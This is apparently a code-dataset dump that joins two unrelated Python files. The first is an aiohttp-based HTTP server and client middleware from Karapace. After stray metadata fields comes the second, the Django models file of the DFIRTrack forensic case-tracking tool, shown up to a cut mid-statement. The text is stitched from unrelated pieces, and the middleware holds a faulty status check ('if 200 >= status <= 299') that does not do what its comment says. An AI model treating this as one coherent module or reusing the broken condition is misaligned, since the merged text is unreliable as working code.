r"\+(?P<serialization_format>json))|(?P<general_format>json|octet-stream))" ) REST_ACCEPT_RE = re.compile( r"(application|\*)/((vnd\.kafka(\.(?P<embedded_format>avro|json|binary|jsonschema))?(\.(?P<api_version>v[12]))?\+" r"(?P<serialization_format>json))|(?P<general_format>json|\*))" ) class HTTPRequest: def __init__( self, *, url: str, query, headers: Dict[str, str], path_for_stats: str, method: str, content_type: Optional[str] = None, accepts: Optional[str] = None, ): self.url = url self.headers = headers self._header_cache: Dict[str, Optional[str]] = {} self.query = query self.content_type = content_type self.accepts = accepts self.path_for_stats = path_for_stats self.method = method self.json = None def get_header(self, header: str, default_value: Optional[str] = None) -> Optional[str]: upper_cased = header.upper() if upper_cased in self._header_cache: return self._header_cache[upper_cased] for h in self.headers.keys(): if h.upper() == upper_cased: value = self.headers[h] self._header_cache[upper_cased] = value return value if upper_cased == "CONTENT-TYPE": # sensible default self._header_cache[upper_cased] = "application/json" else: self._header_cache[upper_cased] = default_value return self._header_cache[upper_cased] def __repr__(self): return "HTTPRequest(url=%s query=%s method=%s json=%r)" % (self.url, self.query, self.method, self.json) class HTTPResponse(Exception): """A custom Response object derived from Exception so it can be raised in response handler callbacks.""" def __init__(self, body, *, status: int = 200, content_type: Optional[str] = None, headers: Dict[str, str] = None): self.body = body self.status = status self.headers = dict(headers) if headers else {} if isinstance(body, (dict, list)): self.headers["Content-Type"] = "application/json" self.json = body else: self.json = None if content_type: self.headers["Content-Type"] = content_type super().__init__("HTTPResponse {}".format(status)) def ok(self): if self.status < 200 or self.status >= 
300: return False return True def __repr__(self): return f"HTTPResponse(status={self.status} body={self.body})" def http_error(message, content_type, code): raise HTTPResponse( body=json_encode({ "error_code": code, "message": message, }, binary=True), headers={"Content-Type": content_type}, status=code, ) class RestApp: def __init__(self, *, app_name, sentry_config): self.app_name = app_name self.app_request_metric = "{}_request".format(app_name) self.app = aiohttp.web.Application() self.app.on_startup.append(self.create_http_client) self.app.on_cleanup.append(self.cleanup_http_client) self.http_client_v = None self.http_client_no_v = None self.log = logging.getLogger(self.app_name) self.stats = StatsClient(sentry_config=sentry_config) self.raven_client = self.stats.raven_client self.app.on_cleanup.append(self.cleanup_stats_client) async def cleanup_stats_client(self, app): # pylint: disable=unused-argument self.stats.close() async def create_http_client(self, app): # pylint: disable=unused-argument no_v_conn = aiohttp.TCPConnector(ssl=False) self.http_client_no_v = aiohttp.ClientSession(connector=no_v_conn, headers={"User-Agent": SERVER_NAME}) self.http_client_v = aiohttp.ClientSession(headers={"User-Agent": SERVER_NAME}) async def cleanup_http_client(self, app): # pylint: disable=unused-argument if self.http_client_no_v: await self.http_client_no_v.close() if self.http_client_v: await self.http_client_v.close() @staticmethod def cors_and_server_headers_for_request(*, request, origin="*"): # pylint: disable=unused-argument return { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Methods": "DELETE, GET, OPTIONS, POST, PUT", "Access-Control-Allow-Headers": "Authorization, Content-Type", "Server": SERVER_NAME, } def check_rest_headers(self, request: HTTPRequest): # pylint: disable=R1710 method = request.method default_content = "application/vnd.kafka.json.v2+json" default_accept = "*/*" result = {"content_type": default_content} content_matcher = 
REST_CONTENT_TYPE_RE.search( cgi.parse_header(request.get_header("Content-Type", default_content))[0] ) accept_matcher = REST_ACCEPT_RE.search(cgi.parse_header(request.get_header("Accept", default_accept))[0]) if method in {"POST", "PUT"}: if not content_matcher: http_error("HTTP 415 Unsupported Media Type", result["content_type"], 415) if content_matcher and accept_matcher: header_info = content_matcher.groupdict() header_info["embedded_format"] = header_info.get("embedded_format") or "binary" result["requests"] = header_info result["accepts"] = accept_matcher.groupdict() return result self.log.error("Not acceptable: %r", request.get_header("accept")) http_error("HTTP 406 Not Acceptable", result["content_type"], 406) def check_schema_headers(self, request: HTTPRequest): method = request.method response_default_content_type = "application/vnd.schemaregistry.v1+json" if method in {"POST", "PUT"} and cgi.parse_header(request.get_header("Content-Type"))[0] not in SCHEMA_CONTENT_TYPES: http_error("HTTP 415 Unsupported Media Type", response_default_content_type, 415) accept_val = request.get_header("Accept") if accept_val: if accept_val == "*/*" or accept_val.startswith("*/"): return response_default_content_type content_type_match = get_best_match(accept_val, SCHEMA_ACCEPT_VALUES) if not content_type_match: self.log.debug("Unexpected Accept value: %r", accept_val) http_error("HTTP 406 Not Acceptable", response_default_content_type, 406) return content_type_match return response_default_content_type async def _handle_request( self, *, request, path_for_stats, callback, schema_request=False, callback_with_request=False, json_request=False, rest_request=False ): start_time = time.monotonic() resp = None rapu_request = HTTPRequest( headers=request.headers, query=request.query, method=request.method, url=request.url, path_for_stats=path_for_stats, ) try: if request.method == "OPTIONS": origin = request.headers.get("Origin") if not origin: raise HTTPResponse(body="OPTIONS 
missing Origin", status=400) headers = self.cors_and_server_headers_for_request(request=rapu_request, origin=origin) raise HTTPResponse(body=b"", status=200, headers=headers) body = await request.read() if json_request: if not body: raise HTTPResponse(body="Missing request JSON body", status=400) try: _, options = cgi.parse_header(rapu_request.get_header("Content-Type")) charset = options.get("charset", "utf-8") body_string = body.decode(charset) rapu_request.json = jsonlib.loads(body_string) except jsonlib.decoder.JSONDecodeError: raise HTTPResponse(body="Invalid request JSON body", status=400) except UnicodeDecodeError: raise HTTPResponse(body=f"Request body is not valid {charset}", status=400) except LookupError: raise HTTPResponse(body=f"Unknown charset {charset}", status=400) else: if body not in {b"", b"{}"}: raise HTTPResponse(body="No request body allowed for this operation", status=400) callback_kwargs = dict(request.match_info) if callback_with_request: callback_kwargs["request"] = rapu_request if rest_request: params = self.check_rest_headers(rapu_request) if "requests" in params: rapu_request.content_type = params["requests"] params.pop("requests") if "accepts" in params: rapu_request.accepts = params["accepts"] params.pop("accepts") callback_kwargs.update(params) if schema_request: content_type = self.check_schema_headers(rapu_request) callback_kwargs["content_type"] = content_type try: data = await callback(**callback_kwargs) status = 200 headers = {} except HTTPResponse as ex: data = ex.body status = ex.status headers = ex.headers except: # pylint: disable=bare-except self.log.exception("Internal server error") data = {"error_code": 500, "message": "Internal server error"} status = 500 headers = {} headers.update(self.cors_and_server_headers_for_request(request=rapu_request)) if isinstance(data, (dict, list)): resp_bytes = json_encode(data, binary=True, sort_keys=True, compact=True) elif isinstance(data, str): if "Content-Type" not in headers: 
headers["Content-Type"] = "text/plain; charset=utf-8" resp_bytes = data.encode("utf-8") else: resp_bytes = data # On 204 - NO CONTENT there is no point of calculating cache headers if 200 >= status <= 299: if resp_bytes: etag = '"{}"'.format(hashlib.md5(resp_bytes).hexdigest()) else: etag = '""' if_none_match = request.headers.get("if-none-match") if if_none_match and if_none_match.replace("W/", "") == etag: status = 304 resp_bytes = b"" headers["access-control-expose-headers"] = "etag" headers["etag"] = etag resp = aiohttp.web.Response(body=resp_bytes, status=status, headers=headers) except HTTPResponse as ex: if isinstance(ex.body, str): resp = aiohttp.web.Response(text=ex.body, status=ex.status, headers=ex.headers) else: resp = aiohttp.web.Response(body=ex.body, status=ex.status, headers=ex.headers) except asyncio.CancelledError: self.log.debug("Client closed connection") raise except Exception as ex: # pylint: disable=broad-except self.stats.unexpected_exception(ex=ex, where="rapu_wrapped_callback") self.log.exception("Unexpected error handling user request: %s %s", request.method, request.url) resp = aiohttp.web.Response(text="Internal Server Error", status=500) finally: self.stats.timing( self.app_request_metric, time.monotonic() - start_time, tags={ "path": path_for_stats, # no `resp` means that we had a failure in exception handler "result": resp.status if resp else 0, "method": request.method, } ) return resp def route(self, path, *, callback, method, schema_request=False, with_request=None, json_body=None, rest_request=False): # pretty path for statsd reporting path_for_stats = re.sub(r"<[\w:]+>", "x", path) # bottle compatible routing aio_route = path aio_route = re.sub(r"<(\w+):path>", r"{\1:.+}", aio_route) aio_route = re.sub(r"<(\w+)>", r"{\1}", aio_route) if (method in {"POST", "PUT"}) and with_request is None: with_request = True if with_request and json_body is None: json_body = True async def wrapped_callback(request): return await 
self._handle_request( request=request, path_for_stats=path_for_stats, callback=callback, schema_request=schema_request, callback_with_request=with_request, json_request=json_body, rest_request=rest_request ) async def wrapped_cors(request): return await self._handle_request( request=request, path_for_stats=path_for_stats, callback=None, ) if not aio_route.endswith("/"): self.app.router.add_route(method, aio_route + "/", wrapped_callback) self.app.router.add_route(method, aio_route, wrapped_callback) else: self.app.router.add_route(method, aio_route, wrapped_callback) self.app.router.add_route(method, aio_route[:-1], wrapped_callback) try: self.app.router.add_route("OPTIONS", aio_route, wrapped_cors) except RuntimeError as ex: if "Added route will never be executed, method OPTIONS is already registered" not in str(ex): raise async def http_request(self, url, *, method="GET", json=None, timeout=10.0, verify=True, proxy=None): close_session = False if isinstance(verify, str): sslcontext = ssl.create_default_context(cadata=verify) else: sslcontext = None if proxy: connector = aiohttp_socks.SocksConnector( socks_ver=aiohttp_socks.SocksVer.SOCKS5, host=proxy["host"], port=proxy["port"], username=proxy["username"], password=proxy["password"], rdns=False, verify_ssl=verify, ssl_context=sslcontext, ) session = aiohttp.ClientSession(connector=connector) close_session = True elif sslcontext: conn = aiohttp.TCPConnector(ssl_context=sslcontext) session = aiohttp.ClientSession(connector=conn) close_session = True elif verify is True: session = self.http_client_v elif verify is False: session = self.http_client_no_v else: raise ValueError("invalid arguments to http_request") func = getattr(session, method.lower()) try: with async_timeout.timeout(timeout): async with func(url, json=json) as response: if response.headers.get("content-type", "").startswith("application/json"): resp_content = await response.json() else: resp_content = await response.text() result = 
HTTPResponse(body=resp_content, status=response.status) finally: if close_session: await session.close() return result def run(self, *, host, port): aiohttp.web.run_app( app=self.app, host=host, port=port, access_log_format='%Tfs %{x-client-ip}i "%r" %s "%{user-agent}i" response=%bb request_body=%{content-length}ib', ) def add_routes(self): pass # Override in sub-classes
en
0.764651
karapace - Custom middleware system on top of `aiohttp` implementing HTTP server and client components for use in Aiven's REST applications. Copyright (c) 2019 Aiven Ltd See LICENSE for details # TODO -> accept more general values as well # sensible default A custom Response object derived from Exception so it can be raised in response handler callbacks. # pylint: disable=unused-argument # pylint: disable=unused-argument # pylint: disable=unused-argument # pylint: disable=unused-argument # pylint: disable=R1710 # pylint: disable=bare-except # On 204 - NO CONTENT there is no point of calculating cache headers # pylint: disable=broad-except # no `resp` means that we had a failure in exception handler # pretty path for statsd reporting # bottle compatible routing # Override in sub-classes
2.053267
2
dfirtrack_main/models.py
0xflotus/dfirtrack
4
6627943
from django.contrib.auth.models import User from django.db import models import logging from time import strftime # initialize logger stdlogger = logging.getLogger(__name__) class Analysisstatus(models.Model): # primary key analysisstatus_id = models.AutoField(primary_key=True) # main entity information analysisstatus_name = models.CharField(max_length=30, unique=True) analysisstatus_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.analysisstatus_name # define logger def logger(analysisstatus, request_user, log_text): stdlogger.info( request_user + log_text + " analysisstatus_id:" + str(analysisstatus.analysisstatus_id) + "|analysisstatus_name:" + str(analysisstatus.analysisstatus_name) + "|analysisstatus_note:" + str(analysisstatus.analysisstatus_note) ) class Analystmemo(models.Model): # primary key analystmemo_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) # main entity information analystmemo_note = models.TextField() # meta information analystmemo_create_time = models.DateTimeField(auto_now_add=True) analystmemo_modify_time = models.DateTimeField(auto_now=True) analystmemo_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='analystmemo_created_by') analystmemo_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='analystmemo_modified_by') # string representation def __str__(self): return 'Analystmemo %s (%s)' % (str(self.analystmemo_id), self.system) # define logger def logger(analystmemo, request_user, log_text): stdlogger.info( request_user + log_text + " analystmemo_id:" + str(analystmemo.analystmemo_id) + "|system:" + str(analystmemo.system) + "|analystmemo_note:" + str(analystmemo.analystmemo_note) ) class Case(models.Model): # primary key case_id = models.AutoField(primary_key=True) # main entity information case_name = models.CharField(max_length=50, unique=True) 
case_is_incident = models.BooleanField() # meta information case_create_time = models.DateTimeField(auto_now_add=True) case_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='case_created_by') # string representation def __str__(self): return self.case_name # define logger def logger(case, request_user, log_text): stdlogger.info( request_user + log_text + " case_id:" + str(case.case_id) + "|case_name:" + str(case.case_name) + "|case_is_incident:" + str(case.case_is_incident) ) class Company(models.Model): # primary key company_id = models.AutoField(primary_key=True) # foreign key(s) division = models.ForeignKey('Division', on_delete=models.SET_NULL, blank=True, null=True) # main entity information company_name = models.CharField(max_length=50, unique=True) company_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.company_name # define logger def logger(company, request_user, log_text): stdlogger.info( request_user + log_text + " company_id:" + str(company.company_id) + "|division:" + str(company.division) + "|company_name:" + str(company.company_name) + "|company_note:" + str(company.company_note) ) class Contact(models.Model): # primary key contact_id = models.AutoField(primary_key=True) # main entity information contact_name = models.CharField(max_length=100) contact_phone = models.CharField(max_length=50, blank=True, null=True) contact_email = models.CharField(max_length=100, unique=True) contact_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.contact_name # define logger def logger(contact, request_user, log_text): stdlogger.info( request_user + log_text + " contact_id:" + str(contact.contact_id) + "|contact_name:" + str(contact.contact_name) + "|contact_phone:" + str(contact.contact_phone) + "|contact_email:" + str(contact.contact_email) + "|contact_note:" + str(contact.contact_note) ) class Division(models.Model): # 
primary key division_id = models.AutoField(primary_key=True) # main entity information division_name = models.CharField(max_length=50, unique=True) division_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.division_name # define logger def logger(division, request_user, log_text): stdlogger.info( request_user + log_text + " division_id:" + str(division.division_id) + "|division_name:" + str(division.division_name) + "|division_note:" + str(division.division_note) ) class Domain(models.Model): # primary key domain_id = models.AutoField(primary_key=True) # main entity information domain_name = models.CharField(max_length=100, unique=True) domain_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.domain_name # define logger def logger(domain, request_user, log_text): stdlogger.info( request_user + log_text + " domain_id:" + str(domain.domain_id) + "|domain_name:" + str(domain.domain_name) + "|domain_note:" + str(domain.domain_note) ) class Entry(models.Model): # primary key entry_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) case = models.ForeignKey('Case', on_delete=models.SET_NULL, blank=True, null=True) # main entity information entry_time = models.DateTimeField() entry_sha1 = models.CharField(max_length=40, blank=True, null=True) entry_date = models.CharField(max_length=10, blank=True, null=True) entry_utc = models.CharField(max_length=8, blank=True, null=True) entry_system = models.CharField(max_length=30, blank=True, null=True) entry_type = models.CharField(max_length=30, blank=True, null=True) entry_content = models.TextField(blank=True, null=True) entry_note = models.TextField(blank=True, null=True) # meta information entry_create_time = models.DateTimeField(auto_now_add=True) entry_modify_time = models.DateTimeField(auto_now=True) entry_api_time = models.DateTimeField(null=True) 
entry_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='entry_created_by') entry_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='entry_modified_by') # define unique together class Meta: unique_together = ('system', 'entry_sha1') # string representation def __str__(self): return '%s | %s | %s' % (str(self.entry_id), self.system, self.entry_sha1) # define logger def logger(entry, request_user, log_text): stdlogger.info( request_user + log_text + " entry_id:" + str(entry.entry_id) + "|system:" + str(entry.system) + "|entry_sha1:" + str(entry.entry_sha1) + "|entry_note:" + str(entry.entry_note) + "|case:" + str(entry.case) ) class Headline(models.Model): # primary key headline_id = models.AutoField(primary_key=True) # main entity information headline_name = models.CharField(max_length=100, unique=True) # string representation def __str__(self): return self.headline_name # define logger def logger(headline, request_user, log_text): stdlogger.info( request_user + log_text + " headline_id:" + str(headline.headline_id) + "|headline_name:" + str(headline.headline_name) ) class Ip(models.Model): # primary key ip_id = models.AutoField(primary_key=True) # main entity information ip_ip = models.GenericIPAddressField(unique=True) # string representation def __str__(self): return self.ip_ip # define logger def logger(ip, request_user, log_text): stdlogger.info( request_user + log_text + " ip_id:" + str(ip.ip_id) + "|ip_ip:" + str(ip.ip_ip) ) class Location(models.Model): # primary key location_id = models.AutoField(primary_key=True) # main entity information location_name = models.CharField(max_length=50, unique=True) location_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.location_name # define logger def logger(location, request_user, log_text): stdlogger.info( request_user + log_text + " location_id:" + str(location.location_id) + "|location_name:" + 
str(location.location_name) + "|location_note:" + str(location.location_note) ) class Os(models.Model): # primary key os_id = models.AutoField(primary_key=True) # main entity information os_name = models.CharField(max_length=30, unique=True) # string representation def __str__(self): return self.os_name # define logger def logger(os, request_user, log_text): stdlogger.info( request_user + log_text + " os_id:" + str(os.os_id) + "|os_name:" + str(os.os_name) ) class Osarch(models.Model): # primary key osarch_id = models.AutoField(primary_key=True) # main entity information osarch_name = models.CharField(max_length=10, unique=True) # string representation def __str__(self): return self.osarch_name # define logger def logger(osarch, request_user, log_text): stdlogger.info( request_user + log_text + " osarch_id:" + str(osarch.osarch_id) + "|osarch_name:" + str(osarch.osarch_name) ) class Osimportname(models.Model): # primary key osimportname_id = models.AutoField(primary_key=True) # foreign key(s) os = models.ForeignKey('Os', on_delete=models.CASCADE) # main entity information osimportname_name = models.CharField(max_length=30, unique=True) osimportname_importer = models.CharField(max_length=30) # string representation def __str__(self): return '%s (%s)' % (self.osimportname_name, self.os) # define logger def logger(osimportname, request_user, log_text): stdlogger.info( request_user + log_text + " osimportname_id:" + str(osimportname.osimportname_id) + "|osimportname_name:" + str(osimportname.osimportname_name) + "|osimportname_importer:" + str(osimportname.osimportname_importer) + "|os:" + str(osimportname.os) ) class Reason(models.Model): # primary key reason_id = models.AutoField(primary_key=True) # main entity information reason_name = models.CharField(max_length=30, unique=True) reason_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.reason_name # define logger def logger(reason, request_user, log_text): 
stdlogger.info( request_user + log_text + " reason_id:" + str(reason.reason_id) + "|reason_name:" + str(reason.reason_name) + "|reason_note:" + str(reason.reason_note) ) class Recommendation(models.Model): # primary key recommendation_id = models.AutoField(primary_key=True) # main entity information recommendation_name = models.CharField(max_length=30, unique=True) recommendation_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.recommendation_name # define logger def logger(recommendation, request_user, log_text): stdlogger.info( request_user + log_text + " recommendation_id:" + str(recommendation.recommendation_id) + "|recommendation_name:" + str(recommendation.recommendation_name) + "|recommendation_note:" + str(recommendation.recommendation_note) ) class Reportitem(models.Model): # primary key reportitem_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) headline = models.ForeignKey('Headline', on_delete=models.PROTECT) # main entity information reportitem_subheadline = models.CharField(max_length=100, blank=True, null=True) reportitem_note = models.TextField() # meta information reportitem_create_time = models.DateTimeField(auto_now_add=True) reportitem_modify_time = models.DateTimeField(auto_now=True) reportitem_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='reportitem_created_by') reportitem_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='reportitem_modified_by') # define unique together class Meta: unique_together = (('system', 'headline', 'reportitem_subheadline'),) # string representation def __str__(self): return '%s | %s | %s' % (self.system, self.headline.headline_name, self.reportitem_subheadline) # define logger def logger(reportitem, request_user, log_text): stdlogger.info( request_user + log_text + " reportitem_id:" + str(reportitem.reportitem_id) + 
"|system:" + str(reportitem.system) + "|headline:" + str(reportitem.headline) + "|reportitem_subheadline:" + str(reportitem.reportitem_subheadline) + "|reportitem_note:" + str(reportitem.reportitem_note) ) class Serviceprovider(models.Model): # primary key serviceprovider_id = models.AutoField(primary_key=True) # main entity information serviceprovider_name = models.CharField(max_length=50, unique=True) serviceprovider_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.serviceprovider_name # define logger def logger(serviceprovider, request_user, log_text): stdlogger.info( request_user + log_text + " serviceprovider_id:" + str(serviceprovider.serviceprovider_id) + "|serviceprovider_name:" + str(serviceprovider.serviceprovider_name) + "|serviceprovider_note:" + str(serviceprovider.serviceprovider_note) ) class System(models.Model): # primary key system_id = models.AutoField(primary_key=True) # foreign key(s) systemstatus = models.ForeignKey('Systemstatus', on_delete=models.PROTECT) analysisstatus = models.ForeignKey('Analysisstatus', on_delete=models.PROTECT, blank=True, null=True) reason = models.ForeignKey('Reason', on_delete=models.PROTECT, blank=True, null=True) recommendation = models.ForeignKey('Recommendation', on_delete=models.PROTECT, blank=True, null=True) systemtype = models.ForeignKey('Systemtype', on_delete=models.PROTECT, blank=True, null=True) ip = models.ManyToManyField('Ip', blank=True) domain = models.ForeignKey('Domain', on_delete=models.PROTECT, blank=True, null=True) os = models.ForeignKey('Os', on_delete=models.PROTECT, blank=True, null=True) osarch = models.ForeignKey('Osarch', on_delete=models.PROTECT, blank=True, null=True) host_system = models.ForeignKey('self', on_delete=models.PROTECT, blank=True, null=True) company = models.ManyToManyField('Company', blank=True) location = models.ForeignKey('Location', on_delete=models.PROTECT, blank=True, null=True) serviceprovider = 
models.ForeignKey('Serviceprovider', on_delete=models.PROTECT, blank=True, null=True) contact = models.ForeignKey('Contact', on_delete=models.PROTECT, blank=True, null=True) tag = models.ManyToManyField('Tag', blank=True) case = models.ManyToManyField('Case', blank=True) # main entity information system_uuid = models.UUIDField(editable=False, null=True, unique=True) system_name = models.CharField(max_length=50) system_dnssuffix = models.CharField(max_length=50, blank=True, null=True) system_install_time = models.DateTimeField(blank=True, null=True) system_lastbooted_time = models.DateTimeField(blank=True, null=True) system_deprecated_time = models.DateTimeField(blank=True, null=True) system_is_vm = models.NullBooleanField(blank=True, null=True) # meta information system_create_time = models.DateTimeField(auto_now_add=True) system_modify_time = models.DateTimeField() system_api_time = models.DateTimeField(null=True) system_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='system_created_by') system_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='system_modified_by') # define unique together class Meta: unique_together = ('system_name', 'domain', 'system_install_time') # string representation def __str__(self): if self.system_install_time == None: return '[%s] %s' % (str(self.system_id), self.system_name) else: installtime = self.system_install_time.strftime('%Y-%m-%d') return '[%s] %s (%s)' % (str(self.system_id), self.system_name, installtime) # define logger def logger(system, request_user, log_text): """ ManyToMany-Relationsship don't get the default 'None' string if they are empty. So the default string is set to 'None'. If there are existing entities, their strings will be used instead and concatenated and separated by comma. 
""" # get objects ips = system.ip.all() # create empty list iplist = [] # set default string if there is no object at all ipstring = 'None' # iterate over objects for ip in ips: # append object to list iplist.append(ip.ip_ip) # join list to comma separated string if there are any objects, else default string will remain ipstring = ','.join(iplist) if system.system_install_time != None: # cast datetime object to string installtime = system.system_install_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string installtime = 'None' if system.system_lastbooted_time != None: # cast datetime object to string lastbootedtime = system.system_lastbooted_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string lastbootedtime = 'None' if system.system_deprecated_time != None: # cast datetime object to string deprecatedtime = system.system_deprecated_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string deprecatedtime = 'None' # get objects companys = system.company.all() # create empty list companylist = [] # set default string if there is no object at all companystring = 'None' # iterate over objects for company in companys: # append object to list companylist.append(company.company_name) # join list to comma separated string if there are any objects, else default string will remain companystring = ','.join(companylist) # get objects tags = system.tag.all() # create empty list taglist = [] # set default string if there is no object at all tagstring = 'None' # iterate over objects for tag in tags: # append object to list taglist.append(tag.tag_name) # join list to comma separated string if there are any objects, else default string will remain tagstring = ','.join(taglist) # get objects cases = system.case.all() # create empty list caselist = [] # set default string if there is no object at all casestring = 'None' # iterate over objects for case in cases: # append object to list caselist.append(case.case_name) # join list to comma separated 
string if there are any objects, else default string will remain casestring = ','.join(caselist) # finally write log stdlogger.info( request_user + log_text + " system_id:" + str(system.system_id) + "|system_uuid:" + str(system.system_uuid) + "|system_name:" + str(system) + "|systemstatus:" + str(system.systemstatus) + "|analyisstatus:" + str(system.analysisstatus) + "|reason:" + str(system.reason) + "|recommendation:" + str(system.recommendation) + "|systemtype:" + str(system.systemtype) + "|ip:" + ipstring + "|domain:" + str(system.domain) + "|system_dnssuffix:" + str(system.system_dnssuffix) + "|os:" + str(system.os) + "|osarch:" + str(system.osarch) + "|system_install_time:" + installtime + "|system_lastbooted_time:" + lastbootedtime + "|system_deprecated_time:" + deprecatedtime + "|system_is_vm:" + str(system.system_is_vm) + "|host_system:" + str(system.host_system) + "|company:" + companystring + "|location:" + str(system.location) + "|serviceprovider:" + str(system.serviceprovider) + "|contact:" + str(system.contact) + "|tag:" + tagstring + "|case:" + casestring ) class Systemstatus(models.Model): # primary key systemstatus_id = models.AutoField(primary_key=True) # main entity information systemstatus_name = models.CharField(max_length=30, unique=True) systemstatus_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.systemstatus_name # define logger def logger(systemstatus, request_user, log_text): stdlogger.info( request_user + log_text + " systemstatus_id:" + str(systemstatus.systemstatus_id) + "|systemstatus_name:" + str(systemstatus.systemstatus_name) + "|systemstatus_note:" + str(systemstatus.systemstatus_note) ) class Systemtype(models.Model): # primary key systemtype_id = models.AutoField(primary_key=True) # main entity information systemtype_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.systemtype_name # define logger def logger(systemtype, 
request_user, log_text): stdlogger.info( request_user + log_text + " systemtype_id:" + str(systemtype.systemtype_id) + "|systemtype_name:" + str(systemtype.systemtype_name) ) class Systemuser(models.Model): # primary key systemuser_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) # main entity information systemuser_name = models.CharField(max_length=50) systemuser_lastlogon_time = models.DateTimeField(blank=True, null=True) # define unique together class Meta: unique_together = ('system', 'systemuser_name') # string representation def __str__(self): return '%s (%s)' % (self.systemuser_name, self.system) # define logger def logger(systemuser, request_user, log_text): stdlogger.info( request_user + log_text + " systemuser_id:" + str(systemuser.systemuser_id) + "|system:" + str(systemuser.system) + "|systemuser_name:" + str(systemuser.systemuser_name) + "|systemuser_lastlogon_time:" + str(systemuser.systemuser_lastlogon_time) ) class Tag(models.Model): # primary key tag_id = models.AutoField(primary_key=True) # foreign key(s) tagcolor = models.ForeignKey('Tagcolor', on_delete=models.PROTECT) # main entity information tag_name = models.CharField(max_length=50, unique=True) tag_note = models.TextField(blank=True, null=True) # meta information tag_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='tag_modified_by', blank=True, null=True) # string representation def __str__(self): return self.tag_name # define logger def logger(tag, request_user, log_text): stdlogger.info( request_user + log_text + " tag_id:" + str(tag.tag_id) + "|tag_name:" + str(tag.tag_name) + "|tag_note:" + str(tag.tag_note) + "|tagcolor:" + str(tag.tagcolor) ) class Tagcolor(models.Model): # primary key tagcolor_id = models.AutoField(primary_key=True) # main entity information tagcolor_name = models.CharField(max_length=20, unique=True) # string representation def __str__(self): return 
self.tagcolor_name # define logger def logger(tagcolor, request_user, log_text): stdlogger.info( request_user + log_text + " tagcolor_id:" + str(tagcolor.tagcolor_id) + "|tagcolor_name:" + str(tagcolor.tagcolor_name) ) class Task(models.Model): # primary key task_id = models.AutoField(primary_key=True) # foreign key(s) parent_task = models.ForeignKey('self', on_delete=models.PROTECT, blank=True, null=True) taskname = models.ForeignKey('Taskname', on_delete=models.PROTECT) taskpriority = models.ForeignKey('Taskpriority', on_delete=models.PROTECT) taskstatus = models.ForeignKey('Taskstatus', on_delete=models.PROTECT) system = models.ForeignKey('System', on_delete=models.CASCADE, blank=True, null=True) task_assigned_to_user_id = models.ForeignKey(User, on_delete=models.PROTECT, blank=True, null=True, related_name='task_assigned_to') tag = models.ManyToManyField('Tag', blank=True) # main entity information task_note = models.TextField(blank=True, null=True) task_scheduled_time = models.DateTimeField(blank=True, null=True) task_started_time = models.DateTimeField(blank=True, null=True) task_finished_time = models.DateTimeField(blank=True, null=True) task_due_time = models.DateTimeField(blank=True, null=True) # meta information task_create_time = models.DateTimeField(auto_now_add=True) task_modify_time = models.DateTimeField(auto_now=True) task_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='task_created_by') task_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='task_modified_by') # string representation def __str__(self): return '[%s] %s (%s)' % (self.task_id, self.taskname, self.system) # define logger def logger(task, request_user, log_text): if task.task_scheduled_time != None: # cast datetime object to string scheduledtime = task.task_scheduled_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string scheduledtime = 'None' if task.task_started_time != None: # cast datetime object to 
string startedtime = task.task_started_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string startedtime = 'None' if task.task_finished_time != None: # cast datetime object to string finishedtime = task.task_finished_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string finishedtime = 'None' if task.task_due_time != None: # cast datetime object to string duetime = task.task_due_time.strftime('%Y-%m-%d %H:%M:%S') # else set default string else: duetime = 'None' # get objects tags = task.tag.all() # create empty list taglist = [] # set default string if there is no object at all tagstring = 'None' # iterate over objects for tag in tags: # append object to list taglist.append(tag.tag_name) # join list to comma separated string if there are any objects, else default string will remain tagstring = ','.join(taglist) # finally write log stdlogger.info( request_user + log_text + " task_id:" + str(task.task_id) + "|parent_task:" + str(task.parent_task) + "|taskname:" + str(task.taskname) + "|taskpriority:" + str(task.taskpriority) + "|taskstatus:" + str(task.taskstatus) + "|system:" + str(task.system) + "|task_assigned_to_user_id:" + str(task.task_assigned_to_user_id) + "|task_note:" + str(task.task_note) + "|task_scheduled_time:" + scheduledtime + "|task_started_time:" + startedtime + "|task_finished_time:" + finishedtime + "|task_due_time:" + duetime + "|tag:" + tagstring ) class Taskname(models.Model): # primary key taskname_id = models.AutoField(primary_key=True) # main entity information taskname_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.taskname_name # define logger def logger(taskname, request_user, log_text): stdlogger.info( request_user + log_text + " taskname_id:" + str(taskname.taskname_id) + 